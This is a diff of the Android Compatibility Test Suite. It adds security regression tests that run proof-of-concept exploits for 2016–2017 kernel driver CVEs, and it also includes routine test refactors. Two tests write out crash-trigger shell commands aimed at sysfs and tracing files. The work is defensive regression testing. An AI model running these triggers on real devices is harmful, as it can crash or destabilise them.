diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..69f8542
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,236 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..46903a8
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index 8d46bb2..5bd6780 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -46,6 +46,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
diff --git a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
index caba01c..4334c1d 100644
--- a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
+++ b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
@@ -22,12 +22,14 @@
import android.test.InstrumentationTestCase;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityManager;
+import android.view.accessibility.AccessibilityManager.AccessibilityServicesStateChangeListener;
import android.view.accessibility.AccessibilityManager.AccessibilityStateChangeListener;
import android.view.accessibility.AccessibilityManager.TouchExplorationStateChangeListener;
import com.android.compatibility.common.util.PollingCheck;
import java.util.List;
+import java.util.concurrent.atomic.AtomicBoolean;
/**
* Class for testing {@link AccessibilityManager}.
@@ -57,11 +59,8 @@
}
public void testAddAndRemoveAccessibilityStateChangeListener() throws Exception {
- AccessibilityStateChangeListener listener = new AccessibilityStateChangeListener() {
- @Override
- public void onAccessibilityStateChanged(boolean enabled) {
+ AccessibilityStateChangeListener listener = (state) -> {
/* do nothing */
- }
};
assertTrue(mAccessibilityManager.addAccessibilityStateChangeListener(listener));
assertTrue(mAccessibilityManager.removeAccessibilityStateChangeListener(listener));
@@ -69,17 +68,23 @@
}
public void testAddAndRemoveTouchExplorationStateChangeListener() throws Exception {
- TouchExplorationStateChangeListener listener = new TouchExplorationStateChangeListener() {
- @Override
- public void onTouchExplorationStateChanged(boolean enabled) {
- // Do nothing.
- }
+ TouchExplorationStateChangeListener listener = (boolean enabled) -> {
+ // Do nothing.
};
assertTrue(mAccessibilityManager.addTouchExplorationStateChangeListener(listener));
assertTrue(mAccessibilityManager.removeTouchExplorationStateChangeListener(listener));
assertFalse(mAccessibilityManager.removeTouchExplorationStateChangeListener(listener));
}
+ public void testAddAndRemoveServiceStateChangeListener() throws Exception {
+ AccessibilityServicesStateChangeListener listener = () -> {
+ // Do Nothing
+ };
+ assertTrue(mAccessibilityManager.addAccessibilityServicesStateChangeListener(listener));
+ assertTrue(mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener));
+ assertFalse(mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener));
+ }
+
public void testIsTouchExplorationEnabled() throws Exception {
new PollingCheck() {
@Override
@@ -181,7 +186,7 @@
}
public void testSendAccessibilityEvent() throws Exception {
- // The APIs are heavily tested in the android.accessibiliyservice package.
+ // The APIs are heavily tested in the android.accessibilityservice package.
// This just makes sure the call does not throw an exception.
waitForAccessibilityEnabled();
mAccessibilityManager.sendAccessibilityEvent(AccessibilityEvent.obtain(
@@ -192,16 +197,62 @@
waitForTouchExplorationEnabled();
}
+ public void testServiceStateChanges_stateChangeListenersCalled() throws Exception {
+ final Object waitObject = new Object();
+ final AtomicBoolean listenerCalled = new AtomicBoolean(false);
+ final SpeakingAccessibilityService service =
+ SpeakingAccessibilityService.sConnectedInstance;
+ final AccessibilityServicesStateChangeListener listener = () -> {
+ synchronized (waitObject) {
+ listenerCalled.set(true);
+ waitObject.notifyAll();
+ }
+ };
+
+ mAccessibilityManager.addAccessibilityServicesStateChangeListener(listener);
+ // Verify called on info change
+ final AccessibilityServiceInfo initialInfo = service.getServiceInfo();
+ AccessibilityServiceInfo tempInfo = service.getServiceInfo();
+ tempInfo.flags ^= AccessibilityServiceInfo.FLAG_ENABLE_ACCESSIBILITY_VOLUME;
+ try {
+ service.setServiceInfo(tempInfo);
+ assertListenerCalled(listenerCalled, waitObject);
+ } finally {
+ service.setServiceInfo(initialInfo);
+ }
+
+ // Verify called on service disabled
+ listenerCalled.set(false);
+ ServiceControlUtils.turnAccessibilityOff(getInstrumentation());
+ assertListenerCalled(listenerCalled, waitObject);
+
+ // Verify called on service enabled
+ listenerCalled.set(false);
+ ServiceControlUtils.enableSpeakingAndVibratingServices(getInstrumentation());
+ assertListenerCalled(listenerCalled, waitObject);
+
+ mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener);
+
+ }
+
+ private void assertListenerCalled(AtomicBoolean listenerCalled, Object waitObject)
+ throws Exception {
+ long timeoutTime = System.currentTimeMillis() + WAIT_FOR_ACCESSIBILITY_ENABLED_TIMEOUT;
+ synchronized (waitObject) {
+ while (!listenerCalled.get() && (System.currentTimeMillis() < timeoutTime)) {
+ waitObject.wait(timeoutTime - System.currentTimeMillis());
+ }
+ }
+ assertTrue("Timed out waiting for listener called", listenerCalled.get());
+ }
+
private void waitForAccessibilityEnabled() throws InterruptedException {
final Object waitObject = new Object();
- AccessibilityStateChangeListener listener = new AccessibilityStateChangeListener() {
- @Override
- public void onAccessibilityStateChanged(boolean b) {
- synchronized (waitObject) {
- waitObject.notifyAll();
+ AccessibilityStateChangeListener listener = (boolean b) -> {
+ synchronized (waitObject) {
+ waitObject.notifyAll();
}
- }
};
mAccessibilityManager.addAccessibilityStateChangeListener(listener);
long timeoutTime = System.currentTimeMillis() + WAIT_FOR_ACCESSIBILITY_ENABLED_TIMEOUT;
@@ -218,12 +269,9 @@
private void waitForTouchExplorationEnabled() throws InterruptedException {
final Object waitObject = new Object();
- TouchExplorationStateChangeListener listener = new TouchExplorationStateChangeListener() {
- @Override
- public void onTouchExplorationStateChanged(boolean b) {
- synchronized (waitObject) {
- waitObject.notifyAll();
- }
+ TouchExplorationStateChangeListener listener = (boolean b) -> {
+ synchronized (waitObject) {
+ waitObject.notifyAll();
}
};
mAccessibilityManager.addTouchExplorationStateChangeListener(listener);
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilitySoftKeyboardModesTest.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilitySoftKeyboardModesTest.java
index 3c1db3b..58d8355 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilitySoftKeyboardModesTest.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/AccessibilitySoftKeyboardModesTest.java
@@ -19,6 +19,9 @@
import android.app.Activity;
import android.app.UiAutomation;
import android.os.Bundle;
+import android.os.Handler;
+import android.os.IBinder;
+import android.os.ResultReceiver;
import android.os.SystemClock;
import android.test.ActivityInstrumentationTestCase2;
import android.view.View;
@@ -29,6 +32,9 @@
import android.view.inputmethod.InputMethodManager;
import java.util.List;
+import java.util.concurrent.ArrayBlockingQueue;
+import java.util.concurrent.BlockingQueue;
+import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
/**
@@ -50,6 +56,12 @@
*/
private static final long TIMEOUT_ACCESSIBILITY_STATE_IDLE = 500;
+ /**
+ * The timeout since {@link InputMethodManager#showSoftInput(View, int, ResultReceiver)}
+ * is called to {@link ResultReceiver#onReceiveResult(int, Bundle)} is called back.
+ */
+ private static final int TIMEOUT_SHOW_SOFTINPUT_RESULT = 2000;
+
private static final int SHOW_MODE_AUTO = 0;
private static final int SHOW_MODE_HIDDEN = 1;
@@ -132,7 +144,13 @@
// The soft keyboard should be in its default mode.
assertEquals(SHOW_MODE_AUTO, mKeyboardController.getShowMode());
- forceImeToBeShown();
+ if (!tryShowSoftInput()) {
+ // If the current (default) IME declined to show its window, then there is nothing we
+ // can test here.
+ // TODO: Create a mock IME so that we can test only the framework behavior.
+ return;
+ }
+
waitForImePresentToBe(true);
// Request the keyboard be hidden.
assertTrue(mKeyboardController.setShowMode(SHOW_MODE_HIDDEN));
@@ -201,13 +219,46 @@
}
}
- private void forceImeToBeShown() {
+ /**
+ * Tries to call {@link InputMethodManager#hideSoftInputFromWindow(IBinder, int)} to see if
+ * software keyboard is shown as a result or not.
+ * @return {@code true} if the current input method reported that it is currently shown
+ * @throws Exception when the result is unknown, including the system did not return the result
+ * within {@link #TIMEOUT_SHOW_SOFTINPUT_RESULT}
+ */
+ private boolean tryShowSoftInput() throws Exception {
+ final BlockingQueue<Integer> queue = new ArrayBlockingQueue<>(1);
+
getInstrumentation().runOnMainSync(() -> {
Activity activity = getActivity();
+ ResultReceiver resultReceiver =
+ new ResultReceiver(new Handler(activity.getMainLooper())) {
+ @Override
+ protected void onReceiveResult(int resultCode, Bundle resultData) {
+ queue.add(resultCode);
+ }
+ };
View editText = activity.findViewById(R.id.edit_text);
activity.getSystemService(InputMethodManager.class)
- .showSoftInput(editText, InputMethodManager.SHOW_FORCED);
+ .showSoftInput(editText, InputMethodManager.SHOW_FORCED, resultReceiver);
});
+
+ Integer result;
+ try {
+ result = queue.poll(TIMEOUT_SHOW_SOFTINPUT_RESULT, TimeUnit.MILLISECONDS);
+ } catch (InterruptedException e) {
+ throw new Exception("Failed to get the result of showSoftInput().", e);
+ }
+ if (result == null) {
+ throw new Exception("Failed to get the result of showSoftInput() within timeout.");
+ }
+ switch (result) {
+ case InputMethodManager.RESULT_SHOWN:
+ case InputMethodManager.RESULT_UNCHANGED_SHOWN:
+ return true;
+ default:
+ return false;
+ }
}
/**
diff --git a/tests/app/src/android/app/cts/SearchManagerTest.java b/tests/app/src/android/app/cts/SearchManagerTest.java
index b1b5623..bf7e2f9 100644
--- a/tests/app/src/android/app/cts/SearchManagerTest.java
+++ b/tests/app/src/android/app/cts/SearchManagerTest.java
@@ -17,10 +17,12 @@
package android.app.cts;
import android.app.SearchManager;
+import android.app.UiModeManager;
import android.app.stubs.CTSActivityTestCaseBase;
import android.app.stubs.SearchManagerStubActivity;
import android.content.Context;
import android.content.Intent;
+import android.content.res.Configuration;
public class SearchManagerTest extends CTSActivityTestCaseBase {
@@ -61,6 +63,10 @@
private boolean hasGlobalSearchActivity() {
Context context = getInstrumentation().getTargetContext();
+ UiModeManager uiModeManager = context.getSystemService(UiModeManager.class);
+ if (uiModeManager.getCurrentModeType() == Configuration.UI_MODE_TYPE_TELEVISION) {
+ return false;
+ }
SearchManager searchManager =
(SearchManager) context.getSystemService(Context.SEARCH_SERVICE);
if (searchManager == null) {
diff --git a/tests/core/runner/src/com/android/cts/core/runner/CoreTestRunner.java b/tests/core/runner/src/com/android/cts/core/runner/CoreTestRunner.java
index 6f18194..46d0898 100644
--- a/tests/core/runner/src/com/android/cts/core/runner/CoreTestRunner.java
+++ b/tests/core/runner/src/com/android/cts/core/runner/CoreTestRunner.java
@@ -34,10 +34,8 @@
import java.util.Collection;
import java.util.Collections;
import java.util.HashSet;
-import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;
-import javax.annotation.Nullable;
import org.junit.runner.Computer;
import org.junit.runner.JUnitCore;
import org.junit.runner.Request;
@@ -48,8 +46,6 @@
import org.junit.runner.notification.RunListener;
import org.junit.runners.model.InitializationError;
import org.junit.runners.model.RunnerBuilder;
-import vogar.ExpectationStore;
-import vogar.ModeId;
import static com.android.cts.core.runner.AndroidJUnitRunnerConstants.ARGUMENT_COUNT;
import static com.android.cts.core.runner.AndroidJUnitRunnerConstants.ARGUMENT_DEBUG;
@@ -69,12 +65,10 @@
*/
public class CoreTestRunner extends Instrumentation {
- public static final String TAG = "LibcoreTestRunner";
+ static final String TAG = "LibcoreTestRunner";
private static final java.lang.String ARGUMENT_ROOT_CLASSES = "core-root-classes";
- private static final String ARGUMENT_EXPECTATIONS = "core-expectations";
-
private static final String ARGUMENT_CORE_LISTENER = "core-listener";
private static final Splitter CLASS_LIST_SPLITTER = Splitter.on(',').trimResults();
@@ -89,12 +83,6 @@
private long testTimeout;
/**
- * The container for any test expectations.
- */
- @Nullable
- private ExpectationStore expectationStore;
-
- /**
* The list of tests to run.
*/
private TestList testList;
@@ -103,6 +91,7 @@
* The list of {@link RunListener} classes to create.
*/
private List<Class<? extends RunListener>> listenerClasses;
+ private Filter expectationFilter;
@Override
public void onCreate(final Bundle args) {
@@ -129,15 +118,7 @@
this.logOnly = "true".equalsIgnoreCase(args.getString(ARGUMENT_LOG_ONLY)) || testCountOnly;
this.testTimeout = parseUnsignedLong(args.getString(ARGUMENT_TIMEOUT), ARGUMENT_TIMEOUT);
- try {
- // Get the set of resource names containing the expectations.
- Set<String> expectationResources = new LinkedHashSet<>(
- getExpectationResourcePaths(args));
- expectationStore = ExpectationStore.parseResources(
- getClass(), expectationResources, ModeId.DEVICE);
- } catch (IOException e) {
- Log.e(TAG, "Could not initialize ExpectationStore: ", e);
- }
+ expectationFilter = new ExpectationBasedFilter(args);
// The test can be run specifying a list of tests to run, or as cts-tradefed does it,
// by passing a fileName with a test to run on each line.
@@ -222,11 +203,7 @@
start();
}
- protected List<String> getExpectationResourcePaths(Bundle args) {
- return CLASS_LIST_SPLITTER.splitToList(args.getString(ARGUMENT_EXPECTATIONS));
- }
-
- protected List<String> getRootClassNames(Bundle args) {
+ private List<String> getRootClassNames(Bundle args) {
String rootClasses = args.getString(ARGUMENT_ROOT_CLASSES);
List<String> roots;
if (rootClasses == null) {
@@ -262,10 +239,8 @@
Filterable filterable = (Filterable) runner;
// Filter out all the tests that are expected to fail.
- Filter filter = new TestFilter(testList, expectationStore);
-
try {
- filterable.filter(filter);
+ filterable.filter(expectationFilter);
} catch (NoTestsRemainException e) {
// Sometimes filtering will remove all tests but we do not care about that.
}
diff --git a/tests/core/runner/src/com/android/cts/core/runner/TestFilter.java b/tests/core/runner/src/com/android/cts/core/runner/ExpectationBasedFilter.java
similarity index 76%
rename from tests/core/runner/src/com/android/cts/core/runner/TestFilter.java
rename to tests/core/runner/src/com/android/cts/core/runner/ExpectationBasedFilter.java
index 8cadbcf..90034ec 100644
--- a/tests/core/runner/src/com/android/cts/core/runner/TestFilter.java
+++ b/tests/core/runner/src/com/android/cts/core/runner/ExpectationBasedFilter.java
@@ -15,8 +15,13 @@
*/
package com.android.cts.core.runner;
+import android.os.Bundle;
import android.util.Log;
+import com.google.common.base.Splitter;
+import java.io.IOException;
+import java.util.LinkedHashSet;
import java.util.List;
+import java.util.Set;
import javax.annotation.Nullable;
import org.junit.runner.Description;
import org.junit.runner.manipulation.Filter;
@@ -24,6 +29,7 @@
import org.junit.runners.Suite;
import vogar.Expectation;
import vogar.ExpectationStore;
+import vogar.ModeId;
import vogar.Result;
/**
@@ -51,25 +57,38 @@
* ...
* </pre>
*
- * <p>And also a flatter hierarchy that looks like this (in CTSv1):
- * Runner
- * Test
- * ...
- * ...
- *
* <p>It cannot filter out the non-leaf nodes in the hierarchy, i.e. {@link Suite} and
* {@link ParentRunner}, as that would prevent it from traversing the hierarchy and finding
* the leaf nodes.
*/
-class TestFilter extends Filter {
+class ExpectationBasedFilter extends Filter {
+
+ static final String TAG = "ExpectationBasedFilter";
+
+ private static final String ARGUMENT_EXPECTATIONS = "core-expectations";
+
+ private static final Splitter CLASS_LIST_SPLITTER = Splitter.on(',').trimResults();
private final ExpectationStore expectationStore;
- private final TestList testList;
+ private static List<String> getExpectationResourcePaths(Bundle args) {
+ return CLASS_LIST_SPLITTER.splitToList(args.getString(ARGUMENT_EXPECTATIONS));
+ }
- public TestFilter(TestList testList, @Nullable ExpectationStore expectationStore) {
+ public ExpectationBasedFilter(Bundle args) {
+ ExpectationStore expectationStore = null;
+ try {
+ // Get the set of resource names containing the expectations.
+ Set<String> expectationResources = new LinkedHashSet<>(
+ getExpectationResourcePaths(args));
+ Log.i(TAG, "Loading expectations from: " + expectationResources);
+ expectationStore = ExpectationStore.parseResources(
+ getClass(), expectationResources, ModeId.DEVICE);
+ } catch (IOException e) {
+ Log.e(TAG, "Could not initialize ExpectationStore: ", e);
+ }
+
this.expectationStore = expectationStore;
- this.testList = testList;
}
@Override
@@ -83,11 +102,6 @@
String methodName = testDescription.getMethodName();
String testName = className + "#" + methodName;
- // If the test isn't in the list of tests to run then do not run it.
- if (!testList.shouldRunTest(testName)) {
- return false;
- }
-
if (expectationStore != null) {
Expectation expectation = expectationStore.get(testName);
if (expectation.getResult() != Result.SUCCESS) {
diff --git a/tests/tests/debug/Android.mk b/tests/tests/debug/Android.mk
new file mode 100644
index 0000000..e2164b0
--- /dev/null
+++ b/tests/tests/debug/Android.mk
@@ -0,0 +1,44 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_PACKAGE_NAME := CtsDebugTestCases
+
+# Don't include this package in any target.
+LOCAL_MODULE_TAGS := optional
+
+# Include both the 32 and 64 bit versions
+LOCAL_MULTILIB := both
+
+# When built, explicitly put it in the data partition.
+LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+
+LOCAL_STATIC_JAVA_LIBRARIES := ctstestrunner
+
+LOCAL_JNI_SHARED_LIBRARIES := libdebugtest
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_SDK_VERSION := current
+
+include $(BUILD_CTS_PACKAGE)
+
+# Include the associated library's makefile.
+include $(LOCAL_PATH)/libdebugtest/Android.mk
diff --git a/tests/tests/debug/AndroidManifest.xml b/tests/tests/debug/AndroidManifest.xml
new file mode 100644
index 0000000..4b3254a
--- /dev/null
+++ b/tests/tests/debug/AndroidManifest.xml
@@ -0,0 +1,34 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2017 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.debug.cts">
+
+ <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />
+ <application android:debuggable="true">
+ <uses-library android:name="android.test.runner" />
+ </application>
+
+ <!-- This is a self-instrumenting test package. -->
+ <instrumentation android:name="android.support.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.debug.cts"
+ android:label="CTS tests of native debugging API">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
+ </instrumentation>
+
+</manifest>
+
diff --git a/tests/tests/debug/AndroidTest.xml b/tests/tests/debug/AndroidTest.xml
new file mode 100644
index 0000000..2c36912
--- /dev/null
+++ b/tests/tests/debug/AndroidTest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2017 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<configuration description="Config for CTS Debug test cases">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.ApkInstaller">
+ <option name="cleanup-apks" value="true" />
+ <option name="test-file-name" value="CtsDebugTestCases.apk" />
+ </target_preparer>
+ <test class="com.android.tradefed.testtype.AndroidJUnitTest" >
+ <option name="package" value="android.debug.cts" />
+ <option name="runtime-hint" value="0m5s" />
+ </test>
+</configuration>
diff --git a/tests/tests/debug/libdebugtest/Android.mk b/tests/tests/debug/libdebugtest/Android.mk
new file mode 100644
index 0000000..65c9756
--- /dev/null
+++ b/tests/tests/debug/libdebugtest/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+#
+# This is the shared library included by the JNI test app.
+#
+
+LOCAL_PATH:= $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libdebugtest
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := \
+ android_debug_cts.cpp
+
+LOCAL_SHARED_LIBRARIES := liblog
+
+LOCAL_SDK_VERSION := 23
+LOCAL_NDK_STL_VARIANT := c++_static
+
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/debug/libdebugtest/android_debug_cts.cpp b/tests/tests/debug/libdebugtest/android_debug_cts.cpp
new file mode 100644
index 0000000..70cb41c
--- /dev/null
+++ b/tests/tests/debug/libdebugtest/android_debug_cts.cpp
